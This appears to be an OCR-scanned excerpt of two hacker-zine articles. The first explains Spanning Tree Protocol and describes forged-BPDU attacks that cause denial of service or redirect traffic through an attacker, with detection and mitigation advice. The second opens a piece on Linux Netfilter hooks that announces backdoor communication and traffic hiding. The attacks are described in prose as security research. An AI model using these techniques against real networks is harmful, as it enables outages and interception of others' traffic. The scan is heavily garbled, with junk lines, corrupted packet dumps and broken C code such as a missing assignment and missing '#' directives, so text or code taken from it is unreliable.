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2. The distribution does not contradict the given licens 


Distribution of this paper in the countries with the legislation containing 
limitations similar to American DMCA contradicts the given license. At the 
moment of publication this includes United States of America (including 
embassies,naval vessels, military bases and other areas of US jurisdiction. 
Moreover, reading this paper by citizens of such a country violates this 
license agreement and may also violate their law. Nevertheless, distribution 
of any links to this document is not a violation of the given licens 


This paper is provided by the authors ‘‘as is’’ and any express or implied 
warranties, including, but not limited to, the implied warranties of 
merchantability and fitness for a particular purpose are disclaimed. In no 
event shall the writers be liable for any direct,indirect, incidental, 
special, exemplary, or consequential damages (including, but not limited to, 
procurement of substitute goods or services; loss of use, data, or profits; or 
business interruption). 


Writers claim this article for educational purposes only. You should not 
read this paper, if you disagree not to use it any other way. 


The given license agreement is subject to change without warning in the 
consent of both writers. 


What is STP? 


Main task of STP protocol is automated management of network topology with 
redundant channels. In general, almost all type of networks are unable to 
accept loops(rings) in their structure. Really, if network equipment is 
connected with superfluous lines, then without additional measures frames 
would be delivered to recipient as a several one - this would result ina 
fault. But business require redundancy, thus there is an STP - it takes care 
that all physical loops are logically disabled unless one of lines gives a 
fault - in this case STP enables line that is currently in reserve. STP should 
guarantee that at each point of time only one of several duplicate links is 
enabled & should automatically switch between them on demand (fault or 
physical topology change). 


How STP works? 
Keka KR KR KR KAY 


STP begin its work from building a tree-alike graph, which begins at 
*“*root’’. One of STP-capable devices becomes a root after winning elections. 
Each STP-capable device (it could be a switch, router or other equipment, 
hereby & later for simplicity called ‘‘bridge’’) starts from power-up claiming 
that it’s root one by sending special data named Bridge Protocol Data Unit 
(BPDU - see [9]) through all ports. The receiver’s address in a BPDU packets 
is a group (multicast) address - this allows BPDUs pass through 
non-intellectual (dumb) equipment like hubs and non STP-aware switches. 


Here as we say ‘‘address’’, we mean MAC-address, since STP is working at 
the level of Media Access Control (MAC). Thereby all issues about STP & its 
vulnerabilities apply equal to the different transmission methods, i.e. 
Ethernet, Token Ring & others. 


After receiving BPDU from other device the bridge compares received 
parameters with its own & depending to result decide to stop or keep insisting 
on its root status. At the end of elections the device with the lowest value 
of the bride identifier becomes a root one. The bridge identifier is a 
combination of bridge MAC address & defined bridge priority. Obviously in a 
network with single STP compatible device it ’ll be a root one. 


Designated root (or ‘‘Designated Root Bridge’’, as named by standard) 
doesn’t have any additional responsibilities - it only used as a beginning 
point to start building topology graph. For all other bridges in a network STP 
defines the ‘‘Root Port’’ - the nearest to the root bridge port. From other 
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ports connected to the bridge it differs by its identifier - combination of 
its MAC address & defined for the port priority. 


The Root Path Cost is also a value meaningful for STP elections - it is 
being build as a sum of path costs: to the root port of given bridge & all 
path costs to root ports of all other bridges on the route to Root one. 


In addition to the ‘‘main’’ Root Bridge STP defines a logical entity called 
*“*‘Designated Bridge’’ - owner of this status becomes main bridge in serving of 
given LAN segment. This is also a subject of elections. 


Similarly STP defines for each network segment the Designated Port (which 
serving given network segment) & corresponding to it ‘‘Designated Cost’’. 


After all the elections are finished, network goes into stable phase. This 


state is characterized by the following conditions: 
— There is only one device in a network claiming itself as a Root one, all 
others are periodically announcing it. 


-— The Root Bridge periodically sends BPDU through all its ports. The sending 
interval is named ‘‘Hello Time’’. 


- In each LAN segment there is a single Designated Root Port and all traffic 
to the Root Bridge is going through it. Compared to other bridges, it has 
lowest value of path cost to the Root Bridge, if these values ar 
identical - the port with a lowest port identifier (MAC plus priority) is 
assigned. 


—- BPDUs are being received & sent by STP-compatible unit on each port, even 
those that are disabled by STP protocol. Exceptionally, BPDUs are not 
operationing on ports that are disabled by administrator. 


- Each bridge forwards frames only between Root Port & Designated Ports for 
corresponding segments. All other ports are blocked. 


As follows from the last item, STP manages topology by changing port states 
within following list: 


Blocking: The port is blocked (discards user frames), but accepts STP BPDUs. 


Listening: 1st stage before forwarding. STP frames (BPDUsS) are OK, but user 
frames are not processed. No learning of addresses yet, since it 
may give wrong data in switching table at this time; 


Learning: 2nd stage of preparation for forwarding state. BPDUs are processed 
in full, user frames are only used to build switching table and not 
forwarded; 

Forwarding: Working state of ports from user view - all frames are processed 


-— STP & user ones. 


At time of network topology reconfiguration all bridge ports are in one of 
three states - Blocking, Listening or Learning, user frames are not delivered 
& network is working only for itself, not for user. 


In stable state all bridges are awaiting periodical Hello BPDUs from Root 
Bridge. If in the time period defined by Max Age Time there was no Hello BPDU, 
then bridge decides that either Root Bridge is Off, either the link to is 
broken. In this case it initiates network topology reconfiguration. By 
defining corresponding parameters it is possible to regulate how fast bridges 
will find topology changes & enable backup links. 


Lets look closer. 
Ka Ka KR KR KR KR KETKY 


Here is a structure of STP Configuration BPDU according to 802.1d standard: 


|Offset | Name |Size | 
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iL Protocol Identifier 2 bytes 
Protocol Version Identifier|1 byte 

BPDU type 1 byte 

Flags 1 byte 

Root Identifier 8 bytes 

Root Path Cost 4 bytes 

Bridge Identifier 8 bytes 

Port Identifier 2 bytes 

Message Age 2 bytes 

Max Age 2 bytes 

Hello Time 2 bytes 

35 Forward Delay 2 bytes 


In a C language: 


typedef struct { 


Bpdu_type type; 

Identifier root_id; 

Cost root_path_cost; 

Identifier bridge_id; 

Port_id port_id; 

Time message_age; 

Time max_age; 

Time hello_time; 

Time forward_delay; 

Flag topology_change_acknowledgement; 
Flag topology_change; 

} Config_bpdu; 

Here is how it look like in a tcpdump: 


screendump 


[root@ws002 root]# tcpdump -c 3 -t -i eth0O stp 
: listening on eth0 
802.1d config 8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 age 0 max 


tcpdump 


20 hel 
802.1d 
20 hel 
802.1d 
20 hel 


lo 2 fdelay 15 


config 8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 age O max 


lo 2 fdelay 15 


config 8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 age O max 


lo 2 fdelay 15 


3 packets received by filter 
0 packets dropped by kernel 


[root@ws002 root] # 


screendump 


And with extra info: 


screendump 


[root@ws002 root]# tcpdump -vvv 1 -xX -ttt -c 3 -i ethO stp 

: listening on eth0 

000000 0:50:e2:bd:58:42 1:80:c2:0:0:0 0026 64: 802.1d config \ 
8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 \ 


tcpdump 
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age 0 max 20 hello 2 fdelay 15 


0x0000 4242 0300 0000 0000 8000 0050 e2bd 5840 BB ya ieee abe P..X@ 
0x0010 0000 0000 8000 0050 e2bd 5840 8002 0000  ~— ....... Pi eG ee oe 
0x0020 1400 0200 Of00 0000 0000 0000 0000 7800 = ..........22-- Xe 
0x0030 0c00 8 
2. 002912 0:50:e2:bd:58:42 1:80:c2:0:0:0 0026 64: 802.1d config \ 
8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 \ 
age 0 max 20 hello 2 fdelay 15 
0x0000 4242 0300 0000 0000 8000 0050 e2bd 5840 BB iS ans cee iv P..X@ 
0x0010 0000 0000 8000 0050 e2bd 5840 8002 0000  — ....... Pir MG. eet 
0x0020 1400 0200 Of00 0000 0000 0000 0000 7800 — ..........22-- Xx. 
0x0030 0c00 23 
2. 046164 0:50:e2:bd:58:42 1:80:c2:0:0:0 0026 64: 802.1d config \ 
8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 \ 
age 0 max 20 hello 2 fdelay 15 
0x0000 4242 0300 0000 0000 8000 0050 e2bd 5840 BB whats etiag fed. P..X@ 
0x0010 0000 0000 8000 0050 e2bd 5840 8002 0000  ~— ....... Bis Gy Sota 
0x0020 1400 0200 Of00 0000 0000 0000 0000 7800 = ..........22-- Xx. 
0x0030 0c00 
3 packets received by filter 
0 packets dropped by kernel 
[root@ws002 root]# 

screendump 
Generally the same is achieved by multicast alias of tcpdump syntax (if you 
‘ve no other multicast traffic in the target network: 

screendump 
[root@ws002 root]# tcpdump -vvv 1 -xX -ttt -c 3 -i ethO multicast 
tcpdump: listening on eth0 
000000 0:50:e2:bd:58:42 1:80:c2:0:0:0 0026 64: 802.1d config \ 
8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 \ 
age 0 max 20 hello 2 fdelay 15 
0x0000 4242 0300 0000 0000 8000 0050 e2bd 5840 BBs: ice igstes 8f0s eh P..X@ 
0x0010 0000 0000 8000 0050 e2bd 5840 8002 0000 ~— ....... Pie aM Ge 2 2:0 
0x0020 1400 0200 Of00 0000 0000 0000 0000 7800 — ..........22-- x. 
0x0030 0c00 we 
2. 004863 0:50:e2:bd:58:42 1:80:c2:0:0:0 0026 64: 802.1d config \ 
8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 \ 
age 0 max 20 hello 2 fdelay 15 
0x0000 4242 0300 0000 0000 8000 0050 e2bd 5840 BB ieee iete eae P..X@ 
0x0010 0000 0000 8000 0050 e2bd 5840 8002 0000  X— ....... Pie MO 2 ee 
0x0020 1400 0200 Of00 0000 0000 0000 0000 7800 = ..........22-- Xx. 
0x0030 0c00 ie 
2. 006193 0:50:e2:bd:58:42 1:80:c2:0:0:0 0026 64: 802.1d config \ 
8000.00:50:e2:bd:58:40.8002 root 8000.00:50:e2:bd:58:40 pathcost 0 \ 
age 0 max 20 hello 2 fdelay 15 
0x0000 4242 0300 0000 0000 8000 0050 e2bd 5840 BB ieeeivd iene ae P..X@ 
0x0010 0000 0000 8000 0050 e2bd 5840 8002 0000 ~— ....... Pees Gee Wiss 
0x0020 1400 0200 Of00 0000 0000 0000 0000 7800  — ..........22-- Xx. 
0x0030 0c00 


3 packets received by filter 
0 packets dropped by kernel 
[root@ws002 root]# 


screendump 


As you see here, normally STP frames are arriving approximately within 
Hello Time (here is 2 seconds). 


STP & VLANs. 


We ‘d like to say some words about STP functioning specific to networks 
with virtual LANs (VLANs). Enabling this mode on a switch is logically 


equivalent to replacing it with a few 
physically there’s no separation between VLANs media. 


(by number of VLANs) 
Lie 


switches, 


even when 


'd be obvious to find 
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there different STP trees, but this option is supported by only some 


quipment (i.e. Intel 460T supports only one STP tree for all VLANs; with 
Avaya’s Cajun switches family you’ll find separate Spanning Tree only in high 
models). These facts are destroying a hope to localize possible STP attacks 


in one VLAN. But there are threats existing even with separate spanning trees 
per VLAN. 


Some vendors realize in their devices extended STP-related futures, 
enhancing their abilities, like Spanning Tree Portfast in Cisco (see [11]) & 
STP Fast Start in some 3Com switches (see [12]). We’1ll show essence of them 
below. Also, some companies support their own implementation of STP, i.e. Dual 
Layer STP from Avaya. Plus, STP modifications functioning for other network 
types (i.e. DECnet). Here we’d like to point on their principle similarity and 
differ only in details and extended abilities (so, in Avaya Dual Layer STP 
trees could be terminated at the 802.1lq-capable ports). All these 
implementation suffer from the same defects as their prototypes. Unpublished 
proprietary protocols give one more problem —- only developers could solve 
their problems, since full revers ngineering (needed to provide good 
bug-fixing solutions) is much harder then small one required to realize 
attacks & by publishing results some would make an evidence of revers 
engineering, which may be illegal. 


Possible attack schemes 
Ka Ka KR KAR KS KS KS KS KS IK ET IKA 


An idea of lst group of attacks lies practically ‘‘on the surface’’. 
Essentially the principle of STP allows easily organize Denial of Service 
(DoS) attack. Really, as defined by standard, on Spanning Tree reconfiguration 
all ports of involved devices does not transfer user frames. Thus, to drop a 
network (or at least one of its segments) into unusable state it’s enough to 
master STP-capable device(s) to do infinite reconfiguration. It could be 
realized by initiating elections of, for example, root bridge, designated 
bridge or root port - practically any of electional object. ‘‘Fortunately’’ 
STP has no any authentication allowing malicious users easily reach this by 
sending fake BPDU. 


A program building BPDU could be written in any high level language having 


raw-socket interface (look at C sample and managing shell script at our 
project home page - [5], [6]). Another way - one may use standard utilities 
for managing Spanning Tree, i.e. from Linux Bridge project([13]), but in this 


case its not possible to manipulate STP parameters with values that doesn’t 
fit into standard specification. Below we will examine base schemes of 
potentially possible attacks. 


Eternal elections. 
keke KS KS KS KS KE KT 


Attacker monitors network with a sniffer (network analyzer) & awaits for 
one of periodical configuration BPDUs from the root bridge (containing its 
identifier). After that he sends into a network a BPDU with identifier that is 
lower then received one (id=id-1) thus it has pretensions to be a root 
bridge itself & initiates elections. Then it decrement identifier by 1 and 
repeat procedure. Each step initiates new elections wave. When identifier 
reach its lowest value attacker return to the value calculated at beginning of 
the attack. As a result network will be forever in elections of the root 
bridge and ports of STP-capable devices will never reach forwarding state 
while attack is in progress. 


Disappearance of root. 
Kaka KS KS KS KS KS KS KS KEK 


With this attack there is no need to get current root bridge identifier 
the lowest possible value is a starting one. This, as we remember, means 
maximum priority. At the end of elections attacker stops sending BPDUs, thus 
after a timeout of Max Age Time gives new elections. At new elections attacker 
also acts as before (and wins). By assigning minimum possible Max Age Time it 
is possible to get situation when all the network will spend all time 
reconfigurating, as it could be in previous algorithm. This attack may occur 
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less effective, but it has simpler realization. Also, depending to network 
scale and other factors (i.e. Forward Delay value, that vary speed of 
switching into a forwarding state) the ports of STP-capable devices may never 
start forwarding the user frames - so we cannot consider this attack as less 
dangerous. 


Merging-splitting of the trees. 
Kea Ka Ka Ke Ka Ka KS KS KS KS KS KS KS KS KE 


In a network with VLAN support it may be possible to lunch a modification 
of discussed above attack by connecting segments with different vlans & STP 
trees. This may be realized without software, by hands, by linking ports 
together with a cross-over cable. This may become a pain for NOC, since it’s 
hard to detect. 


Local Denial of Service. 
Ke kee Khe Ke Ke KS KS KS KS KS KE KT 


Attacker may make Denial of Service not for the entire network, but just on 
a part of it. There could be many motivations, i.e. it may isolate victim 
client from real server to make ‘‘fake server’’ attack. Lets look for 
realization of this type of attack on example. 


| Switch w/ STP #1 | Switch w/ STP #2 | 
v v 
| | | 

| | | <= 

| | | | | 

is Bese % | a2 | | ==| 

a aati: Feat I || | | ==| 

|Client|’ I Phl a 

| PC | | hae | | 

Nests / fsss== | | | 
SSsss=/ Attackers a= 
Notebook Server 


Picture 1 

On the picture 1 server is connected to one switch & victim is connected 
to another one (connectivity to the bridge may include hubs). Attacker 
needs to fool nearest switch & make it think that he(she) has better way 
to the bridge that serves server computer. 


In terms of STP, attacker must initiate & win elections of designated bridge 
for server segment. As a result of winning such elections the channel between 
bridges would be disabled by setting corresponding ports to the blocked state. 
By destroying connectivity between segments attacker may either try to fool 
client claiming itself as a real server (compare with well known Mitnick 
attack) or just feel satisfied if mischief is a subject. 


BPDU filter. 


Obvious way to attack is to set a loop that is undetectable by STP by 
organizing physical ring with filtering there of all BPDU frames. 


Man In the Middle. 
Keke Kee KS KS KE KE KT 


Next two attacks have principal difference from already discussed - the 
goal of them not to achieve denial of service, but data penetrating, that 
impossible in the normal network operation mode. In short, this attack uses 
STP to change logical structure of network to direct sensitive traffic via 
attacker’s station. Let’s look at the 2nd picture. 
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Clients segment Server segment 
| Switch w/ STP #1 xe ox | Switch w/ STP #2 | 
, i 
| | | | 
| | | | — 
| | | | | | 
[Pe ee 3 lb gees | | S| 
SS ce== aa | | | | | [== 
|Client |’ | |Attacking : a | 
| PC | | \e 1) Be | / | 
‘so==5= / ee L } | 
=a a=/ | Seceree= ee 
Server 


Picture 1 


As against mentioned above partial denial of service attack, suppose that 
attackers station is equipped with two NICs, one Network Interface Card 
is connected to the ‘‘client’s’’ segment, and another - to the ‘‘server’s’’ 
segment. By sending appropriate BPDU attacker initiates elections of the 
designated bridge for both segments and wins them. As a result, existing 
link between switches (marked as "-X X-" ) will shut down (will switch to 
the blocking state) and all inter-segment traffic will be directed via 
attacker’s station. If intruder’s plans does not include denial of service, 
he(she) MUST provide frame forwarding between NICs. It’s a very simple 
task if attacker doesn’t needed to change traffic in some manner. This 
may be done by either creating simple program module or using built-in STP 
functions of the operating system, for example with Linux Bridge Project (s 
[13]), which contribute complete bridge solution. Of course, an intruder must 
take in account ‘‘bottle neck’’ problem inter-segment link may work at 
100Mb (1Gb) speed while client’s ports may provide only 10Mb (100Mb) speed, 
which lead to the network productivity degradation and partial data loss (but 
software realization of back pressure shouldn’t be a big deal). Of course, if 
attacker wants to ‘‘edit’’ traffic on the fly on a heavy loaded link, he(she) 
may need more powerful computer (both CPU and RAM). Fortunately, this attack 
is impossible in networks with single switch - try to realize it in these 
conditions and you will get partial DoS. Also note, that realization is 
trivial only when attacker is connected to neighbored switches. If connections 
are made to the switches without direct link, there is additional task - 
guessing at least one Bridge ID, because STP-capable devices never forward 
BPDU, sending on the base of received information its own, instead. 


Provocated Sniffing. 
Ka Kae Ke Ke KS KS KS KE KE 


In general, sniffing is data penetrating by switching network interface 
into promiscuous mode. In this mode NIC receives all the frames, not only 
broadcasts and directed to it. There’re well known attack on networks 
based on switches, these ar ither poison targets MAC address table by fake 
ARP replies, either over-full bridge switching table and thus making it behave 
like a hub, but with splitting collision domains. Almost the same results may 
be achieved using STP. 


According specification after tree reconfiguration (for example, after 
designated bridge elections) STP-capable device MUST remove from the 
switching table all the records (except those statically set by 
administrator), included before switch gone into listening and learning 
state. As a result switch will go into hub mode for some time whil ite “retii4 
switching table. Of course, you already noted weakness of this theory: switch 
learns too fast. After receiving first frame from victim it writes its MAC 
address into switching table and stops to broadcast them to all ports. 
However, we must not ignore this attack. This is because manufacturers 
include in their products some ‘‘extensions’’ to core STP. Just after 
elections network is unreachable. To reduce down time some manufacturers 
(Cisco, Avaya, 3Com, HP, etc) include an ability to discard listening and 
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learning states on the ‘‘user’’ ports (ports with servers and workstations 
connected to). In other words, port is switching from ‘‘blocked’’ state 
directly to ‘‘forwarding’’ state. This ability has different names: Spanning 
Tree Portfast (Cisco —- [11]), STP Fast Start (3Com - [12]) etc. If this 
ability turned on, eternal elections would lead not to DoS, but to periodical 
resets of the switching table, that means hub-mode. Note, that this function 
should not be turned ON on the trunk ports, because STP convergence 
(finalization of elections to a stable state) not guaranteed in this case. 
Fortunately, to achieve its goal an intruder must clear switching table at 
least two times fast than interesting packets are received, that is 
practically impossible. Anyway it allows collecting of some sensitive data. 
Also note, that this attack allows to catch all frames, because it works on 
the channel level of OSI and redirects all protocols (including IPX, NETBEUI 
etc), not only IP (as ARP-poisoning). 


Other possible attacks. 
Ka Ke Kae Ke KS KS KS KS KS KE KE 


These attacks are unchecked, but we suppose, that them are possible. 


STP attack on the neighbor VLAN. 
Keka Ke Ke Ke Ka Ka KS KS KS KS KS KS KE KS 


According 802.1q a bridge with VLAN support can receive on the given 
channel either all the frames, or the frames with appropriate tags. In 
VLAN-divided networks frames containing STP packets will be transmitted via 
trunk link with appropriate tags. So, there is an ability to attack VLAN by 
sending STP packets in tagged frames to the port, which doesn’t support tags. 
Fortunately, according 802.lq a bridge may filter out those frames. For 
example, Cisco devices drop down tagged frames on the tag-incompatible ports 
(at least, users), that makes this attack impossible. But note, that bridge 
MAY, not MUST drop these frames. 


STP on WAN links. 
Keka KR KR KAKA KAKA 


We also must understand, that WAN links are vulnerable to STP attacks too. 
This because BCP specification declare STP over PPP support. Surprising 
consequence of this fact is an ability to attack ISP network via dial-up 
connection. According RFC2878 (BCP description, see [RFC2878]) STP turned on 
on the PPP link if both sides requesting it, that never takes place in 
practice. Nevertheless, STP supported by default on the majority Cisco 
routers, at least models, capable to combine virtual interfaces into bridge 
group. 


This applies to GARP. 


Kaka KS KS KS KS KS KS KES KEK 


As you may read in the Generic Attribute Registration Protocol (GARP) 
specification by 802.1d the STP is a subset of GARP. Some of discussed above 
attack work against GARP and, in particular, Generic VLAN Registration 
Protocol (GVRP). Therefore VLANs cannot be used as single security measure in 
network. 802.1q standard originated from 802.1d and inherits all its defects. 


We may continue our research of non-standard using STP. All new materials 
will be available on the project web-page (s D3) 2 


Brief resume. 


So, we shown that unfortunately all networks supporting 802.1d and, 
with some restrictions, those that support 802.1lq are all vulnerable. 


While some devices support STP only if administrator turned on appropriate 
option during configuration process, others support STP by default, ‘‘from 
the box’’ (most of current vendors enable STP by default). Ask your admin: 
does our network need STP support? Is STP support turned off on our hardware? 
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Detection and protection. 
Keka Ke Ke KS KS KS KS KS KS KS KE 


What is the main difficulty with STP-based attacks detection? The problem 
is that for this attack used standard C-BPDU packets, so presence STP packets 
on the network is not strong characteristic of attack. Other difficulty is 
that Intrusion Detection System (IDS) must have in its disposal information 
about network scheme, at least, list of network devices (with bridges IDs) to 
distinguish usual STP traffic from intruder’s packets. Moreover, as a main 
goal of attack is network availability, IDS must have its own alarm channel. 
But note that in this case there possible false negatives attack will not 
detected if malicious BPDUs affect network hardware before IDS disclose them. 
Each real network normal state can be described in STP terms. For example, in 
a network which normally doesn’t use STP appearance of STP packets most likely 
Signify an STP attack attempt. Series of Root Bridge elections with sequential 
lowering Root Bridge ID may signify ‘‘eternal election’’ attack. In a network 
with fixed list of device IDs appearance of BPDUs with new ID in most cases 
may Signify an attack (except, of course some ridiculous cases like 
installation of new device by ones of poor-coordinated administration team). 
We suppose, that most effective solution is adaptive self-learning IDS using 
neural networks technology, because the can dynamically compare actual network 
state with ‘‘normal’’ state. One of most significant measure is STP fraction 
in total traffic amount. 


Quick fix? 


What can network administrators do while problem exists? 


- If STP is not barest necessity for your network, it must be disabled. As 
we noted above, in most devices STP is enabled by default. 

—- In many cases backup links can be controlled using other mechanisms like 
Link Aggregation. This feature supported by many devices, including Intel, 
Avaya etc. 

—- If hardware supports individual STP settings on each port then STP must be 
switched off on all ports except tagged port connected to other network 
hardware, but not user workstations. Especially this must be taken in 
account by ISP, because malicious users may attempt to make DoS against 
either ISP network either other client’s networks. 

- If possible administrators must to segment STP realm, i.e. create several 
independent spanning trees. Particularly, if two network segment (offices) 
connected via WAN link, STP on this link must be switched off. 


Conclusion 


Each complicated system inevitably has some errors and communications is 
not an exclusion. But this fact is not a reason to stop evolution of 
information technologies - we can totally escape mistakes only if we do 
nothing. Meanwhile increasing complexity of technologies demand new approach 
to development, an approach, which takes in account all conditions and 
factors, including information security. We suppose that developers must use 
new methods, like mathematical simulation of produced system, which takes in 
account not only specified controlling and disturbing impacts on the system, 
but also predicts system behavior when input values are outside of specified 
range. 


It is no wonder that developers in first place take in account primary goal 
of system creation and other questions gives little consideration. But if we 
don’t include appropriate security measures while system development, it is 
practically impossible to ‘‘make secure’’ this system when it is already 
created. At least, this process is very expensive, because core design lacks 
are hard to detect and too hard (some times - impossible) to repair in 
contrast to implementation and configuration errors. 
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--{ 1 - Introduction 


This article describes how quirks (not necessarily weaknesses) in the 
Linux network stack can be used for various purposes, nefarious or otherw- 
ise. Presented here will be a discussion on using seemingly legitimate 
Netfilter hooks for backdoor communications and also a technique to hide 
such traffic from a Libpcap based sniffer running on the local machine. 


Netfilter is a subsystem in the Linux 2.4 kernel. Netfilter makes 
such network tricks as packet filtering, network address translation 
(NAT) and connection tracking possible through the use of various hooks in 
the kernel’s network code. These hooks are places that kernel code, either 
statically built or in the form of a loadable module, can register 
functions to be called for specific network events. An example of such an 
event is the reception of a packet. 


—----[{ 1.1 - What this document is 


This document discusses how a module writer can make use of the Netfilter 
hooks for whatever purposes and also how network traffic can be hidden 
from a Libpcap application. Although Linux 2.4 supports hooks for IPv4, 
IPv6 and DECnet, only IPv4 will be discussed in this document. However, 
most of the IPv4 content can be applied to the other protocols. As an aide 
to teaching, a working kernel module that provides basic packet filtering 
is provided in Appendix A. Any development/experimentation done for this 
document was done on an Intel machine running Linux 2.4.5. Testing the 
behaviour of Netfilter hooks was done using the loopback device, an 
Ethernet device and a modem Point-to-Point interface. 
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This document is also written for my benefit in an attempt to fully 


understand Netfilter. I do not guarantee that any code accompanying this 
document is 100% error free but I have tested all code provided here. I 


have suffered the kernel faults so hopefully you won’t have to. Also, I 
do not accept any responsibility for damages that may occur through 
following this document. It is expected that the reader be comfortable with 
the C programming language and have som xperience with Loadable Kernel 
Modules. 


If I have made a mistake in something presented here then please let m 
know. I am also open to suggestions on either improving this document or 
other nifty Netfilter tricks in general. 


----[{ 1.2 - What this document is not 


This document is not a complete ins-and-outs reference for Netfilter. It 
is also *not* a reference for the iptables command. If you want to learn 
more about the iptables command, consult the man pages. 


So let’s get started with an introduction to using Netfilter... 


--[ 2 - The various Netfilter hooks and their uses 
----[ 2.1 - The Linux kernel’s handling of packets 


As much as I would love to go into the gory details of Linux’s handling of 
packets andthe events preceeding and following ach Netfilter hook, I 
won’t. The simple reason is that Harald Welte has already written a nice 
document on the subject, his Journey of a Packet Through the Linux 2.4 
Network Stack document. To learn more on Linux’s handling of packets, I 
strongly suggest that you read this document as well. For now, just 
understand that as a packet moves through the Linux kernel’s network stack 
it crosses several hook locations where packets can be analysed and kept 
or discarded. These are the Netfilter hooks. 


Goss = [ 2.2 The Netfilter hooks for IPv4 


Netfilter defines five hooks for IPv4. The declaration of the symbols for 
these can be found in linux/netfilter_ipv4.h. These hooks are displayed 
in the table below: 


Table 1: Available IPv4 hooks 


Hook Called 
NF_IP_PRE_ ROUTING After sanity checks, before routing decisions. 
NF_IP_LOCAL_IN After routing decisions if packet is for this host. 
NF_IP_FORWARD If the packet is destined for another interface. 
NF_IP_LOCAL_OUT For packets coming from local processes on 
their way out. 
NF_IP_POST_ROUTING Just before outbound packets "hit the wire". 


The NF_IP_PRE_ROUTING hook is called as the first hook after a packet 
has been received. This is the hook that the module presented later will 
utilise. Yes the other hooks are very useful as well, but for now we 
will focus only on NF_IP_PRE_ROUTING. 


After hook functions have done whatever processing they need to do with 
a packet they must’ return one of th predefined Netfilter return codes. 
These codes ar 


Table 2: Netfilter return codes 

Return Code Meaning 
NF_DROP Discard the packet. 
NF_ACCEPT Keep the packet. 
NF_STOLEN Forget about the packet. 
NF_QUEUE Queue packet for userspace. 
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NF_REPEAT Call this hook function again. 


The NF_DROP return code means that this packet should be dropped 
completely and any resources allocated for it should be released. 
NF_ACCEPT tells Netfilter that so far the packet is still acceptable and 
that it should move to the next stage of the network stack. NF_STOLEN is 
an interesting one because it tells Netfilter to "forget" about the packet. 
What this tells Netfilter is that the hook function will take processing 
of this packet from here and that Netfilter should drop all processing of 
aE. % This does not mean, however, that resources for the packet are 
released. The packet and it’s respective sk_buff structure are still valid, 
it’s just that the hook function has taken ownership of the packet away 
from Netfilter. Unfortunately I’m not exactly clear on what NF_QUEUE 
really does so for now I won’t discuss it. The last return value, 
NF_REPEAT requests that Netfilter calls the hook function again. Obviously 
one must be careful using NF_REPEAT so as to avoid an endless loop. 


[= 3 Registering and unregistering Netfilter hooks 


Registration of a hook function is a very simple process that revolves 
around the nf_hook_ops structure, defined in lJlinux/netfilter.h. The 
definition of this structure is as follows: 


struct nf_hook_ops { 
struct list_head list; 


/* User fills in from here down. */ 

nf_hookfn *hook; 

int pf; 

int hooknum; 

/* Hooks are ordered in ascending priority. */ 
int priority; 


}; 


The list member of this structure is used to maintain the lists of 
Netfilter hooks and has no importance for hook registration as far as users 
are concerned. hook is a pointer to a nf_hookfn function. This is the 


function that will be called for the hook. nf_hookfn is defined in 
linux/netfilter.h as well. The pf field specifies a protocol family. Valid 
protocol families are available from linux/socket.h but for IPv4 we want to 
use PF_INET. The hooknum field specifies th particular hook to install 
this function for and is one of the values listed in table 1. Finally, the 
priority field specifies where in the order of execution this hook function 
should be placed. For IPv4, acceptable values are defined in 
linux/netfilter_ipv4.h in the nf_ip_hook_priorities enumeration. For the 
purposes of demonstration modules we will be using NF_IP_PRI_FIRST. 


Registration of a Netfilter hook requires using a nf_hook_ops structure 


with the nf_register_hook() function. nf_register_hook() takes the address 
of an nf_hook_ops structure and returns an integer value. However, if you 
actually look at the code for the nf_register_hook() function in 


net/core/netfilter.c, you will notice that it only ever returns a_ value of 
zero. Provided below is example code that simply registers a function that 
will drop all packets that come in. This code will also show how the 
Netfilter return values are interpreted. 


Listing 1. Registration of a Netfilter hook 
/* Sample code to install a Netfilter hook function that will 
* drop all incoming packets. */ 


define _ KERNEL __ 
define MODULE 


include <linux/module.h> 
include <linux/kernel.h> 
include <linux/netfilter.h> 
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#include <linux/netfilter_ipv4.h> 


/* This is the structure we shall use to register our function */ 
static struct nf_hook_ops nfho; 


/* This is the hook function itself */ 
unsigned int hook_func(unsigned int hooknum, 
struct sk_buff **skb, 
const struct net_device *in, 
const struct net_device *out, 
int (*okfn) (struct sk_buff *)) 
{ 
return NF_DROP; /* Drop ALL packets */ 
} 


/* Initialisation routine */ 
int init _module() 


{ 


/* Fill in our hook structure */ 


nfho.hook = hook_func; /* Handler function */ 
nfho.hooknum = NF_IP_PRE ROUTING; /* First hook for IPv4 */ 
nfho.pf = PF_INET; 


nfho.priority NF_IP_PRI_FIRST; /* Make our function first */ 


nf_register_hook (&nfho) ; 


return 0; 


} 


/* Cleanup routine */ 
void cleanup_module() 
{ 
nf_unregister_hook (&nfho) ; 


} 


That’s all there is to it. From the code given in listing 1 you can _ see 
that unregistering a Netfilter hook is a simple matter of calling 
nf_unregister_hook() with the address of the same structure you used to 
register the hook. 


--[ 4 - Basic packet filtering techniques with Netfilter 
----[ 4.1 - A closer look at hook functions 


Now its time to start looking at what data gets passed into hook 
functions and how that data an be used to make filtering decisions. So 
let’s look more closely at the prototype for nf_hookfn functions. The 
prototype is given in linux/netfilter.h as follows: 


typedef unsigned int nf_hookfn(unsigned int hooknum, 
struct sk_buff **skb, 
const struct net_device *in, 
const struct net_device *out, 
int (*okfn) (struct sk_buff *)); 


The first argument to nf_hookfn functions is a value specifying one of 
the hook types given in table 1. The second argument is more interesting. 
It is a pointer to a pointer to a sk_buff structure, the structure used 
by the network stack to describe packets. This structure is defined in 
linux/skbuff.h and due to its size, I shall only highlight some of it’s 
more interesting fields here. 


Possibly the most useful fields out of sk_buff structures are the thr 

unions that describe the transport header (ie. UDP, TCP, ICMP, SPX), the 
network header (ie. IPv4/6, IPX, RAW) and the link layer header (Ethernet 
or RAW). The names of these unions are h, nh and mac respectively. These 
unions contain several structures, depending on what protocols are in use 
in a particular packet. One should note that the transport header and 
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network header may very well point to the same location in memory. This 
is the case for TCP packets where h and nh are both considered as 
